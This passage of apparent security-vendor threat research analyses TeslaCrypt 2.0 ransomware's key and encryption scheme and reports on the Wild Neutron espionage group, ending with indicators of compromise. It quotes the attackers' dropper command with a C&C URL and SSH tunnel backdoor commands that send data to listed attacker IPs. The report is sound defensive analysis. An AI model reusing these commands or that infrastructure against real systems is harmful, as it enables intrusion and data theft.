In any event, this is not the only change from the previous version of TeslaCrypt. The encryption scheme has been improved again and is now even more sophisticated than before. Keys are generated using the ECDH algorithm. The cybercriminals introduced it in versions 0.3.x, but in this version it seems more relevant because it serves a specific purpose, enabling the attackers to decrypt files using a ‘master key’ alone. More about this in due course.

The TeslaCrypt 2.0 encryption scheme Generation of key data

The Trojan uses two sets of keys – ‘master keys’ that are unique for each infected system and ‘session keys’ that are generated each time the malware is launched on the system.

Master key generation

Let Q be a standard secp256k1 elliptic curve (“SECG curve over a 256 bit prime field”) and G be the generator of a cyclic subgroup of points on this curve.

Let malware_pub be the attackers’ public key contained in the Trojan’s body (it is a point on the Q curve, stored as two separate coordinates – x and y).

When infecting a system, the Trojan generates:

  • install_id – the infection identifier – a random 8-byte sequence.
  • master_btc_priv – the private master key – a random 32-byte sequence, which is sent to the C&C.
  • master_btc_pub = master_btc_priv * G (point on the curve) – the public master key; stored in encrypted files.
  • btc_address – a bitcoin address used to receive the ransom payment – generated using the standard Bitcoin algorithm, based on master_btc_pub.
  • master_ecdh_secret = ECDH(malware_pub, master_btc_priv) – a “shared master key”, required for decryption if master_btc_priv is lost or does not reach the C&C; not saved anywhere in this form.
  • master_ecdh_secret_mul = master_ecdh_secret * master_btc_priv – a number that can be used to recover master_btc_priv; stored in the system.

Note
master_btc_priv (in accordance with the Bitcoin operating principle) is a private key that is needed to ‘withdraw’ the Bitcoins sent to the newly created address btc_address.

Session key generation

Every time it is launched (when first infecting a computer or, e.g., after a reboot), the Trojan generates new copies of:

  • session_priv – a private session key – random 32 bytes. Used to encrypt files, not saved anywhere
  • session_pub = session_priv * G – a public session key. Stored in encrypted files.
  • session_ecdh_secret = ECDH(master_btc_pub, session_priv) – a “shared session key” – needed to decrypt files, not saved anywhere in this form.
  • session_ecdh_secret_mul = session_ecdh_secret * session_priv – a number that can be used to recover session_ecdh_secret. Stored in encrypted files.
Key data saved in the system

Unlike previous version of the malware, TeslaCrypt 2.0.0 does not use key.dat or storage.bin to store data. Instead, it uses the system registry: an install_id value is stored in HKCU\Software\msys\ID, and the following structure is added to HKCU\Software\<install_id>\data:

In the familiar syntax of the C programming language, the structure can be described as follows:

Here is what it looks like on an infected system:

File encryption

Starting from version 0.3.5, TeslaCrypt affects both regular drives connected to the system and all file resources available on the network (shares), even if they are not mounted as drives with letters of their own. Few other encryptors can boast this functionality.

Each file is encrypted using the AES-256-CBC algorithm with session_priv as a key. An encrypted file gets an additional extension, “.zzz”. A service structure is added to the beginning of the file, followed by encrypted file contents. The structure has the following format:

The same structure in C language syntax:

File decryption

The authors of TeslaCrypt 2.0.0 completely removed the file decryption feature that was present in earlier versions of the malware. Based on analyzing the encryption scheme described above, we can suggest the following algorithms for decrypting the files:

  1. If master_btc_priv is known, do the following:

    • Read session_pub from the encrypted file;
    • Calculate session_ecdh_secret = ECDH(session_pub, master_btc_priv);
    • Read session_ecdh_secret_mul from the encrypted file;
    • Calculate session_priv = session_ecdh_secret_mul / session_ecdh_secret;
    • Decrypt the file using the session_priv key.
  2. If master_btc_priv is unknown, but malware_priv is known (and the only people who know it are the cybercriminals who added the corresponding malware_pub to the Trojan’s body):

    • Read master_btc_pub from the registry or encrypted file;
    • Calculate master_ecdh_secret = ECDH(master_btc_pub, malware_priv);
    • Read master_ecdh_secret_mul from the encrypted file
    • Calculate master_btc_priv = master_ecdh_secret_mul / master_ecdh_secret;
    • With master_btc_priv known, perform the steps from item 1.

To get a full understanding of the subject matter, it is worth reading about the Diffie-Hellman algorithm and ECDH – its version for elliptic curves. For example, this is a good resource.

Other features Evading detection

The Trojan implements a detection evasion technique based on using COM objects. We first saw it used in TeslaCrypt version 0.4.0, but since then it has been slightly modified. Pseudocode generated based on version 2.0.0 looks like this:

C&C communication

The Trojan’s sample contains a static list of C&C addresses. The servers are actually on the Tor network, but communication with them is carried out through the Web using tor2web services.

Before TeslaCrypt version 0.4.1, server requests were sent in plaintext; in subsequent versions they were encrypted using the AES-256-CBC algorithm, with a SHA256 hash of a static string from the malicious program’s body used as a key.

The pseudocode screenshot below shows the process of creating an HTTP request to be sent by the Trojan when infecting a system.

Distribution

Malware from the TeslaCrypt family is known to be distributed using exploit kits such as Angler, Sweet Orange and Nuclear. This method of distributing malware works as follows: when a victim visits an infected website, an exploit’s malicious code uses vulnerabilities in the browser (usually in plugins) to install target malware in the system.

Geographical distribution of users attacked by malware from the TeslaCrypt family

Recommendations

To protect data from encrypting ransomware, we advise users to backup all their important files regularly. Backup copies should be stored on drives that can only be written to as part of the process of backing up data. For example, home users can use external hard drives, physically disconnecting them from the computer immediately after creating backup copies.

Promptly updating software (particularly browser plugins and the browser itself) is also extremely important, since vendors are always striving to close any vulnerabilities that are exploited by cybercriminals.

If malware did find its way into the system, an up-to-date antivirus product with updated databases and activated protection modules can help to stop it from doing any harm. This is especially true of the proactive protection module, which is the last line of defense against 0-day threats.

Wild Neutron – Economic espionage threat actor returns with new tricks

Wed, 07/08/2015 - 09:04

Indicators of Compromise (IOC)

A powerful threat actor known as “Wild Neutron” (also known as “Jripbot” and “Morpho”) has been active since at least 2011, infecting high profile companies for several years by using a combination of exploits, watering holes and multi-platform malware.

The latest round of attacks in 2015 uses a stolen code signing certificate belonging to Taiwanese electronics maker Acer and an unknown Flash Player exploit.

Wild Neutron hit the spotlight in 2013, when it successfully infected companies such as Apple, Facebook, Twitter and Microsoft. This attack took advantage of a Java zero-day exploit and used hacked forums as watering holes. The 2013 incident was highly publicized and, in the aftermath, the threat actor went dark for almost one year.

#WildNeutron is a powerful entity engaged in espionage, possibly for economic reasons

Tweet

In late 2013 and early 2014 the attacks resumed and continued throughout 2015. Targets of the new attacks include:

  • Law firms
  • Bitcoin-related companies
  • Investment companies
  • Large company groups often involved in M&A deals
  • IT companies
  • Healthcare companies
  • Real estate companies
  • Individual users

The focus of these attacks suggests this is not a nation-state sponsored actor. However, the use of zero-days, multi-platform malware as well as other techniques makes us believe it’s a powerful entity engaged in espionage, possibly for economic reasons.

Older (2013) campaigns

During the 2013 attacks, the Wild Neutron actor successfully compromised and leveraged the website www.iphonedevsdk[.]com, which is an iPhone developers forum.

The attackers injected a script into the forum that redirected visitors to another website (min.liveanalytics[.]orgcurrently SINKHOLED by Kaspersky Lab) that hosted a Java zero-day exploit. A similar attack was also found in another forum dedicated to Linux developers: fedoraforum[.]org. For a more detailed analysis of these 2013 attacks, see Eric Romang’s blog.

Other forums compromised by the Wild Neutron group and identified by reports from the Kaspersky Security Network include:

  • expatforum.com
  • mygsmindia.com
  • forum.samdroid.net
  • emiratesmac.com
  • forums.kyngdvb.com
  • community.flexispy.com
  • ansar1.info

In particular, two of these stand out: “community.flexispy[.]com” and “ansar1[.]info“. The first one is a community ran by Flexispy, a company that sells spyware for mobile devices. The second one is a Jihadist forum that is currently closed.

ansar1[.]info was injected by Wild Neutron in 2013

Back in 2013, the attackers also leveraged a Mac OS X backdoor, known as OSX/Pintsized. This is also described in more detail in Eric Romang’s excellent blog. The same backdoor, compiled for Win32, is still being used in the 2015 attacks.

#WildNeutron is one of the most unusual APT group we've analysed and tracked

Tweet

Some of the more prominent victims of the 2013 attack include Twitter, Facebook, Apple and Microsoft. These breaches were covered widely by the press and some affect companies, issued statements on the incident (see Facebook’s statement).

The targeting of major IT companies like Facebook, Twitter, Apple and Microsoft is unusual, however, it’s not entirely unique. The lack of victims in other sectors, such as diplomatic or government institutions, is however quite unusual. This makes us believe this is not a nation-state sponsored attack.

Technical analysis

The malware set used by the Wild Neutron threat actor has several component groups, including:

  • A main backdoor module that initiates the first communication with C&C server
  • Several information gathering modules
  • Exploitation tools
  • SSH-based exfiltration tools
  • Intermediate loaders and droppers that decrypt and run the payloads

Although customized, some of the modules seem to be heavily based on open source tools (e.g. the password dumper resembles the code of Mimikatz and Pass-The-Hash Toolkit) and commercial malware (HTTPS proxy module is practically identical to the one that is used by Hesperbot).

Although customized, some of the modules seem to be heavily based on open source tools #WildNeutron

Tweet

All C&C communication is encrypted with a custom protocol. Dropped executables, as well as some of the hardcoded strings are usually obfuscated with XOR (depends on bot version). The main backdoor module contains a number of evasion techniques, designed to detect or time out sandboxes and emulation engines.

Exploitation – 2015

The initial infection vector from the 2014-2015 attacks is still unknown, although there are clear indications that the victims are exploited by a kit that leverages an unknown Flash Player exploit.

The following exploitation chain was observed in one of the attacks:

Site hxxp://cryptomag.mediasource.ch/ Paths /favicon.ico
/msie9html5.jpg
/loader-large.gif
/bootstrap.min.css
/stats.js?d=1434374526478
/autoload.js?styleid=20&langid=5&sid=883f2efa&d=1434374526
/banner.html?styleid=19&langid=23&sid=883f2efa&d=1434374526
/883f2efa/bniqligx.swf?styleid=4&langid=6&sid=883f2efa&d=1434374533
/883f2efa/pzixfgne?styleid=5&langid=25&sid=883f2efa&d=1434374533
/883f2efa/bniqligx.swf?styleid=4&langid=6&sid=883f2efa&d=1434374533/
/background.jpg

The subdomain cryptomag.mediasource[.]ch appears to have been created for this attack; it pointed to an IP address associated with other Wild Neutron C&Cs, highlighted in red below:

Hosts resolving to 66.55.133[.]89

While app.cloudprotect[.]eu and ssl.cloudprotect[.]eu are two known Wild Neutron C&Cs, cryptomag.mediasource[.]ch appears to have been pointed to this IP for the purpose of exploitation. Another suspicious domain can be observed above, secure.pdf-info[.]com. We haven’t seen any attacks connected with his hostname yet, however, the name scheme indicates this is also malicious.

In another attack, we observed a similar exploitation chain, however hosted on a different website, hxxp://find.a-job.today/.

In both cases, the visitors browsed the website, or arrived via what appears to have been an online advertisement. From there, “autoload.js” appears in both cases, which redirects to another randomly named HTML file, which eventually loads a randomly named SWF file.

While the group used watering hole attacks in 2013, it’s still unclear how victims get redirected to the exploitation kits in the new 2014-2015 attacks. Instead of Flash exploits, older Wild Neutron exploitation and watering holes used what was a Java zero-day at the end of 2012 and the beginning of 2013, detected by Kaspersky Lab products as Exploit.Java.CVE-2012-3213.b.

The main malware dropper

The functionality of the main dropper is relatively simple: it decrypts the backdoor executable (stored as a resource and encrypted with a simple XOR 0x66), writes it to a specified path and then executes it with parameters that are hardcoded in the dropper body. One of the parameters is the URL address of the C&C server, while others contain various bot configuration options.

Example parameters used by the dropper:

igfxupt.exe https://app.cloudprotect[.]eu:443 /opts resolv=logs.cloudprotect[.]eu

After executing the main backdoor, the dropper is securely deleted by overwriting its content with random numbers several times before renaming and removing the file.

The main backdoor (aka “Jripbot”)

This binary is executed with a parameter that the URL address of the C&C server and optionally an initial bot configuration; this information is then double-encrypted – first with RC4 and then with Windows CryptProtectData function – and saved to the registry.

Before performing any other activity, the malware first runs its stalling code (designed to outrun the emulators), then performs several anti-sandboxing checks and enters an infinite loop if any unwanted software running in the system is detected.

Otherwise, it gathers some basic system information:

  • Version of the operating system
  • If program is running under WOW64
  • If current user has administrator privileges
  • Which security features of Windows are enabled
  • Username and computer name
  • Server name and LAN group
  • Information about logical drives
  • System uptime and idle time
  • Default web browser
  • Proxy settings

Based on some of this information, malware generates a unique ID for the victim and starts the C&C communication by sending the ID value and awaiting commands.

Backdoor configuration options may include proxy server address and credentials, sleeptime/delay values and connection type, but the most interesting option is the resolv=[url] option. If this option is set, the malware generates a domain name consisting of computer name, unique ID and and the URL passed with this option; then it tries to resolve the IP address of this domain. We suspect this is the method the attackers use to send the generated UID to the C&C.

Commands from the C&C may instruct the bot to perform following actions:

  • Change the current directory to the requested one
  • Execute an arbitrary command in the command line
  • Set the autorun value for itself in the registry
  • Delete the autorun value for itself in the registry
  • Shred requested file (overwrite the file content with random numbers, overwrite the file name with zeroes and then delete it)
  • Download file from the Internet and save it (optionally encrypted) to the disk
  • Install or uninstall additional malware plugins
  • Collect and send system information
  • Enumerate drives
  • Set sleeptime value
  • Update the configuration
  • Update itself
  • Quit

Older versions of this backdoor, used in the 2013 attacks, had a bit more functionality:

  • Password harvesting
  • Port scanning
  • Collecting screenshots
  • Pushing files to C&C
  • Reverse shell

These features were removed from the newer backdoor versions that are used in recent attacks. Instead, malware developers decided to implement a plugin mechanism and run different tools for different tasks. This suggests a clear shift towards more flexible modular architecture.

#WildNeutron hide the C&C address by encrypting it in the registry with machine-dependent information

Tweet

In terms of functionality, the main backdoor is no different from many other Remote Access Tools (RATs). What really stands out is the attacker’s carefulness to hide the C&C address, by encrypting it in the registry with machine-dependent information. Also notable is the ability to recover from a C&C shutdown by contacting a dynamically generated domain name, which only the attackers know in advance, as it is directly tied to each unique victim.

According to the timestamp of the samples the distribution is as follows:

Each backdoor appears to contain an internal version number, which ranges from 11000 to 16000 in the latest samples. This allows us to trace the following evolutionary map:

Backdoors used in the 2013 attacks:

MD5 Timestamp Version Filename Size 1582d68144de2808b518934f0a02bfd6 29 Nov 2012 11000 javacpl.exe 327168 14ba21a3a0081ef60e676fd4945a8bdc 30 Nov 2012 12000 javacpl.exe 329728 0fa3657af06a8cc8ef14c445acd92c0f 09 Jan 2013 13000 javacpl.exe 343552

Backdoors used in 2014 and 2015 attacks:

MD5 Timestamp Version Filename Size 95ffe4ab4b158602917dd2a999a8caf8 13 Dec 2013 14014 LiveUpdater.exe 302592 342887a7ec6b9f709adcb81fef0d30a3 20 Jun 2014 15013 FlashUtil.exe 302592 dee8297785b70f490cc00c0763e31b69 02 Aug 2013
(possibly fake) 16010 IgfxUpt.exe 291328 f0fff29391e7c2e7b13eb4a806276a84 27 Oct 2014 16017 RtlUpd.exe 253952

The installers also have a version number, which indicates the following evolution:

MD5 Timestamp Version 1f5f5db7b15fe672e8db091d9a291df0 16 Dec 2011 1.4.1 48319e9166cda8f605f9dce36f115bc8 28 Sep 2012 1.5.0 088472f712d1491783bbad87bcc17c48 12 Apr 2013 1.6.3 ee24a7ad8d137e54b854095188de0bbf 07 Jan 2014 1.6.4 Lateral movement

After installing the main backdoor and establishing initial C2 communication, the attackers use a range of different tools to extract sensitive data and control the victim’s machine. These tools include a password harvesting trojan, a reverse-shell backdoor and customized implementations of OpenSSH, WMIC and SMB. Sometimes, they only drop a simple perl reverse shell and use various collection methods to retrieve credentials from a set of machines, escalate privileges, and fan out across a network from there. Besides these tools, there is also a number of small utility modules of different functionalities, from loaders and configuration tools, to file shredders and network proxies.

It’s also worth noting that this threat actor heavily relies on already existing code, using publicly available open source applications, as well as Metasploit tools and leaked malware sources, to build its own toolset. Some of these tools are designed to work under Cygwin and come together with the Cygwin API DLL, which may suggest that the attackers feel more comfortable when working in a Linux-like environment.

SSH tunnel backdoor

During the 2014/2015 attacks, we observed the attackers deploying custom, OpenSSH-based Win32 tunnel backdoors that are used to exfiltrate large amounts of data in a reliable manner. These tunnel backdoors are written as “updt.dat” and executed with two parameters, -z and -p. These specify the IP to connect to and the port. Despite the port number 443, the connection is SSH:

  • /d /u /c updt.dat -z 185.10.58.181 -p 443
  • /d /u /c updt.dat -z 46.183.217.132 -p 443
  • /d /u /c updt.dat -z 217.23.6.13 -p 443

For authentication, the SSH tunnel backdoor contains a hardcoded RSA private key.

Stolen certificate

During the 2015 attacks, Wild Neutron used a dropper signed with a stolen, yet valid Acer Incorporated certificate.

Acer signature on Wild Neutron dropper

The abused certificate has the following properties:

Serial: 5c c5 3b a3 e8 31 a7 df dc 7c 28 d5 15 8f c3 80
Thumbprint: 0d 85 91 41 ee 9a 0c 6e 72 5f fe 6b cf c9 9f 3e fc c3 fc 07

The dropper (dbb0ea0436f70f2a178a60c4d8b791b3) appears to have been signed on June 15, 2015. It drops a Jripbot backdoor as “IgfxUpt.exe” and configures it to use the C&C “app.cloudprotect[.]eu”.

#WildNeutron used a dropper signed with a stolen, yet valid Acer Incorporated certificate

Tweet

We have contacted Verisign and requested revocation of the certificate.

Victims and statistics

The Wild Neutron attacks appear to have a highly targeted nature. During our investigation, we have been able to identify several victims across 11 countries:

  • France
  • Russia
  • Switzerland
  • Germany
  • Austria
  • Palestine
  • Slovenia
  • Kazakhstan
  • UAE
  • Algeria
  • United States

The victims for the 2014-2015 versions are generally IT and real estate/investment companies and in both cases, a small number of computers have been infected throughout the organizations. The attackers appear to have updated the malware implant and deployed some additional tools, however, we haven’t observed serious lateral movement in these cases.

Attribution

The targeting of various companies, without a government focus, makes us believe this is not a nation state sponsored APT. The attackers have also shown an interest in investment related targets, which indicate knowledge and skills to exploit such information on the market to turn it into financial advantages.

In some of the samples, the encrypted configuration includes a Romanian language string #WildNeutron

Tweet

In some of the samples, the encrypted configuration includes a Romanian language string, which is used to mark the end of the C&C communication:

Interestingly, “La revedere” means “goodbye” in Romanian. In addition to that, we found another non-English string which is the latin transcription of the russian word Успешно (“uspeshno” -> “successfully”); this string is written to a pipe after executing a C2 command.

We found another non-English string which is the latin transcription of the russian word #WildNeutron

Tweet

One of the samples has an internal name of “WinRAT-Win32-Release.exe”. This seems to indicate the authors are calling the malware “WinRAT”.

More information about the Wild Neutron attribution is available to Kaspersky Intelligence Services customers. Contact: intelreports@kaspersky.com

Conclusions

Compared to other APT groups, Wild Neutron is one of the most unusual ones we’ve analysed and tracked. Active since 2011, the group has been using at least one zero-day exploit, custom malware and tools and managed to keep a relatively solid opsec which so far eluded most attribution efforts. Their targeting of major IT companies, spyware developers (FlexiSPY), jihadist forums (the “Ansar Al-Mujahideen English Forum”) and Bitcoin companies indicate a flexible yet unusual mindset and interests.

Some of group’s distinctive features include:

  • Use of open source tools and leaked sources of other malware
  • Use of stolen certificate from Acer Incorporated to sign malware
  • Use of cross platform zero-day exploit (Java and Flash) followed by cross platform payload reverse shell (Perl) for initial penetration
  • Use of *NIX code ported to Windows through Cygwin
  • Heavy use of SSH for exfiltration, a commonly used *NIX administration tool
  • Use of CryptProtectData API to keep C&C URLs secret
  • Simple command line interface, built around all malware components, utilizing named pipes for communication between modules;
  • Auxiliary tools are written in C and most of them contain a built-in help, which may be printed by executing the binary with a “–pleh” parameter

We continue to track the Wild Neutron group, which is still active as of June 2015.

Kaspersky products detect the malware used in the attacks as:
HEUR:Trojan.Win32.WildNeutron.gen, Trojan.Win32.WildNeutron.*, Trojan.Win32.JripBot.*, HEUR:Trojan.Win32.Generic

Indicators of Compromise (IOCs) Known malicious hostnames and domains:

ddosprotected.eu
updatesoft.eu
app.cloudprotect.eu
fw.ddosprotected.eu
logs.cloudprotect.eu
ssl.cloudprotect.eu
ssl.updatesoft.eu
adb.strangled.net
digitalinsight-ltd.com
ads.digitalinsight-ltd.com
cache.cloudbox-storage.com
cloudbox-storage.com
clust12-akmai.net
corp-aapl.com
fb.clust12-akmai.net
fbcbn.net
img.digitalinsight-ltd.com
jdk-update.com
liveanalytics.org
min.liveanalytics.org
pop.digitalinsight-ltd.com
ww1.jdk-update.com
find.a-job.today
cryptomag.mediasource.ch

Known malicious IPs:

185.10.58.181
46.183.217.132
64.187.225.231
62.113.238.104
66.55.133.89
217.23.6.13

Known file names:

%APPDATA%\Roaming\FlashUtil.exe
%APPDATA%\Roaming\Acer\LiveUpdater.exe
%APPDATA%\Roaming\Realtek\RtlUpd.exe
%ProgramData%\Realtek\RtlUpd.exe
%APPDATA%\Roaming\sqlite3.dll (UPX packed)
%WINDIR%\winsession.dll
%APPDATA%\appdata\local\temp\teamviewer\version9\update.exe
%SYSTEMROOT%\temp\_dbg.tmp
%SYSTEMROOT%\temp\ok.tmp
C:\windows\temp\debug.txt
C:\windows\syswow64\mshtaex.exe
%SYSROOT%\System32\mshtaex.exe
%SYSROOT%\System32\wdigestEx.dll
%SYSROOT%\System32\dpcore16t.dll
%SYSROOT%\System32\iastor32.exe
%SYSROOT%\System32\mspool.dll
%SYSROOT%\System32\msvcse.exe
%SYSROOT%\System32\mspool.exe
C:\Program Files (x86)\LNVSuite\LnrAuth.dll
C:\Program Files (x86)\LNVSuite\LnrAuthSvc.dll
C:\Program Files (x86)\LNVSuite\LnrUpdt.exe
C:\Program Files (x86)\LNVSuite\LnrUpdtP.exe
DF39527~.tmp

Named pipes:

\\.\pipe\winsession
\\.\pipe\lsassw

Events & mutexes:

Global\LnrRTPDispatchEvents
_Winlogon_TCP_Service

Pages